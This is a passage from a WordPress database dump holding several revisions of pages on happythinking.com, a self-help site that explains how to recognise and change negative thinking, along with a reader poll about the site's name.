(1917, 1, '2023-06-21 09:46:39', '2023-06-21 09:46:39', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>A small message from the author of this website: This website is new and I am trying to choose a website name for it. Currently, it is called happythinking.com, but I have the option to change it to changenegativethinking.com.I am not sure which name is better so I would be grateful if you will help me choose by clicking on which name below that you think is better. Thank you!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-06-21 09:46:39', '2023-06-21 09:46:39', '', 1910, 'https://www.happythinking.com/?p=1917', 0, 'revision', '', 0),
(1919, 1, '2023-06-21 09:53:27', '2023-06-21 09:53:27', '<!-- wp:shortcode -->\n[yop_poll id="1" show_results="1"]\n<!-- /wp:shortcode -->', 'Result', '', 'publish', 'closed', 'closed', '', 'result', '', '', '2023-06-26 07:43:03', '2023-06-26 07:43:03', '', 0, 'https://www.happythinking.com/?page_id=1919', 0, 'page', '', 0),
(1920, 1, '2023-06-21 09:53:27', '2023-06-21 09:53:27', '<!-- wp:shortcode -->\n[yop_poll id="1" show_results="1"]\n<!-- /wp:shortcode -->', 'Result', '', 'inherit', 'closed', 'closed', '', '1919-revision-v1', '', '', '2023-06-21 09:53:27', '2023-06-21 09:53:27', '', 1919, 'https://www.happythinking.com/?p=1920', 0, 'revision', '', 0),
(1923, 1, '2023-06-21 10:24:58', '2023-06-21 10:24:58', '<!-- wp:image {"align":"center","id":1922,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking_210623.jpg" alt="" class="wp-image-1922"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind.&nbsp; While recognising negative thinking is important, you also need ways of dealing with such thinking. For this, I will share with you various mental techniques (â€œmental toolsâ€) that will help you to change negative thinking into more positive ways of thinking. These mental tools will be very practical so that you can use them in your day to day life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1910} /-->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-21 10:24:58', '2023-06-21 10:24:58', '', 88, 'https://www.happythinking.com/?p=1923', 0, 'revision', '', 0),
(1925, 1, '2023-06-21 10:44:11', '2023-06-21 10:44:11', '<!-- wp:paragraph -->\n<p>First of all, welcome to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me a happier person and I am very pleased to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the world we live in is full of stress and challenges, and a lot of these we are not able to get rid of, at least in the short term. In other words, we need to be able to be as happy as we can, despite the various challenges around us.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>While we may not be able to always control the things happening around us, one thing we can control is how our minds â€œthinkâ€. Happiness is created by thoughts, so thinking in positive and useful ways can promote happiness in us. On the other hand, thinking in negative and useless ways can push us into unhappiness. The â€œway we thinkâ€ is an immensely powerful determinant of our happiness.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1842,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg" alt="" class="wp-image-1842"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:block {"ref":1910} /-->\n\n<!-- wp:paragraph -->\n<p>â€œHappy Thinkingâ€ is about changing oneâ€™s negative thinking so that one can, despite the challenges around oneself, be in a state of happiness. To help one to achieve this in a logical manner, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe, in an easy-to-understand way, common negative thinking that people do. This will help one to recognise such thinking when it happens in oneâ€™s mind. An important aspect of changing negative thinking is to be able to recognise such thinking. After all, how can one change something that one does not see? For this reason, the first part of the website will purely focus on describing negative thinking, without explaining how you can change such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that oneâ€™s mind can use to change negative thinking. I like to think of such mental techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, one will be able to use these tools to change oneâ€™s negative thinking. These â€œtoolsâ€ are very practical so that one will be able to use them in oneâ€™s daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving tools to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make one into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1868,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron170623.jpg" alt="" class="wp-image-1868"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-21 10:44:11', '2023-06-21 10:44:11', '', 1034, 'https://www.happythinking.com/?p=1925', 0, 'revision', '', 0),
(1929, 1, '2023-06-21 15:09:26', '2023-06-21 15:09:26', '<!-- wp:image {"align":"center","id":1922,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking_210623.jpg" alt="" class="wp-image-1922"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-21 15:09:26', '2023-06-21 15:09:26', '', 88, 'https://www.happythinking.com/?p=1929', 0, 'revision', '', 0),
(1926, 1, '2023-06-21 12:58:17', '2023-06-21 12:58:17', '<!-- wp:image {"align":"center","id":1922,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking_210623.jpg" alt="" class="wp-image-1922"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:block {"ref":1910} /-->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind.&nbsp; While recognising negative thinking is important, you also need ways of dealing with such thinking. For this, I will share with you various mental techniques (â€œmental toolsâ€) that will help you to change negative thinking into more positive ways of thinking. These mental tools will be very practical so that you can use them in your day to day life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-21 12:58:17', '2023-06-21 12:58:17', '', 88, 'https://www.happythinking.com/?p=1926', 0, 'revision', '', 0),
(1975, 1, '2023-06-26 20:01:53', '2023-06-26 20:01:53', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Here is a small message from the author of this website: I would be grateful before you proceed, if you will answer this one question survey that will take you only a few seconds. I am planning to make a new website about a wise monk giving advice to a person on how to be happy. I need to choose a nice name for the website and to help me decide, I will be grateful if will click on one of the website names in the list below that you think is best. Then click "vote" and your choice will be anonymously recorded. This will really help me to decide on which name to use. Thank you for your kind help.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-06-26 20:01:53', '2023-06-26 20:01:53', '', 1910, 'https://www.happythinking.com/?p=1975', 0, 'revision', '', 0),
(1932, 1, '2023-06-21 15:23:30', '2023-06-21 15:23:30', '<!-- wp:paragraph -->\n<p>First of all, welcome to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me a happier person and I am very pleased to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the world we live in is full of stress and problems, which at times can make it challenging to find happiness. Luckily, while we may not be able to always control the things happening around us, one thing we can control is how our minds â€œthinkâ€. Happiness is created by thoughts, so thinking in positive and useful ways can promote happiness in us.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, thinking in negative and useless ways can push us into unhappiness. The â€œway we thinkâ€ is an immensely powerful determinant of our happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1842,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg" alt="" class="wp-image-1842"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>â€œHappy Thinkingâ€ is about changing oneâ€™s negative thinking so that one can, despite the challenges around oneself, be in a state of happiness. To help one to achieve this in a logical manner, I have divided this website about Happy Thinking into two main sections.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first section, I will describe, in an easy-to-understand way, common types of negative thinking that people do. This will help one to recognise such thinking when it happens in oneâ€™s mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second section, I will describe various mental methods that oneâ€™s mind can use to change negative thinking. I like to think of such methods as â€œtoolsâ€, and just like a repairman will use various tools to repair something, one will be able to use these methods to change oneâ€™s negative thinking. These â€œmethodsâ€ are very practical so that one will be able to use them in oneâ€™s daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make one into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1868,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron170623.jpg" alt="" class="wp-image-1868"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (first section of this website), I will explain to you in an easy-to-understand way, common types of negative thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you learn about the common types of negative thinking, see which ones are applicable to you. It is very important to keep an open mind when learning about the various types of negative thinking. Think twice before assuming that you do not think in negative ways as your mind may try and convince itself (i.e. you) that it is a perfect thinker!&nbsp; You may also recognise such thinking in your friends and family. If you do, please tell them about this website!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>When describing negative thinking, I will use certain examples to make things clear. However, to keep this website readable, I have often made these examples somewhat simplistic and they may not always exactly match your circumstances, so please add some imagination to make my examples more relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental methods that you can use to deal with negative thinking. It would make more sense to learn about them after you understand the various types of negative thinking, as then you will be able to better appreciate how to use the methods. So as you read about the types of negative thinking, please do not think that I have forgotten to tell you about the various methods! I promise I will share them with you later.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of negative thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it. Like lots of things, you need to go slow so that you can appreciate and digest knowledge. Only then will it benefit you. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let''s move on to understand common types of negative thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-21 15:23:30', '2023-06-21 15:23:30', '', 1034, 'https://www.happythinking.com/?p=1932', 0, 'revision', '', 0),
(1931, 1, '2023-06-21 15:21:06', '2023-06-21 15:21:06', '<!-- wp:paragraph -->\n<p>First of all, welcome to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me a happier person and I am very pleased to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the world we live in is full of stress and problems, which at times can make it challenging to find happiness. Luckily, while we may not be able to always control the things happening around us, one thing we can control is how our minds â€œthinkâ€. Happiness is created by thoughts, so thinking in positive and useful ways can promote happiness in us.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, thinking in negative and useless ways can push us into unhappiness. The â€œway we thinkâ€ is an immensely powerful determinant of our happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1842,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg" alt="" class="wp-image-1842"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>â€œHappy Thinkingâ€ is about changing oneâ€™s negative thinking so that one can, despite the challenges around oneself, be in a state of happiness. To help one to achieve this in a logical manner, I have divided this website about Happy Thinking into two main sections.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first section, I will describe, in an easy-to-understand way, common types of negative thinking that people do. This will help one to recognise such thinking when it happens in oneâ€™s mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second section, I will describe various mental methods that oneâ€™s mind can use to change negative thinking. I like to think of such methods as â€œtoolsâ€, and just like a repairman will use various tools to repair something, one will be able to use these methods to change oneâ€™s negative thinking. These â€œmethodsâ€ are very practical so that one will be able to use them in oneâ€™s daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make one into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1868,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron170623.jpg" alt="" class="wp-image-1868"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (first section of this website), I will explain to you in an easy-to-understand way, common types of negative thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you learn about the common types of negative thinking, see which ones are applicable to you. It is very important to keep an open mind when learning about the various types of negative thinking. Think twice before assuming that you do not think in negative ways as your mind may try and convince itself (i.e. you) that it is a perfect thinker!&nbsp; You may also recognise such thinking in your friends and family. If you do, please tell them about this website!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When describing negative thinking, I will use certain examples to make things clear. However, to keep this website readable, I have often made these examples somewhat simplistic and they may not always exactly match your circumstances, so please add some imagination to make my examples more relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental methods that you can use to deal with negative thinking. It would make more sense to learn about them after you understand the various types of negative thinking, as then you will be able to better appreciate how to use the methods. So as you read about the types of negative thinking, please do not think that I have forgotten to tell you about the various methods! I promise I will share them with you later.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of negative thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it. Like lots of things, you need to go slow so that you can appreciate and digest knowledge. Only then will it benefit you. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let''s move on to understand common types of negative thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button 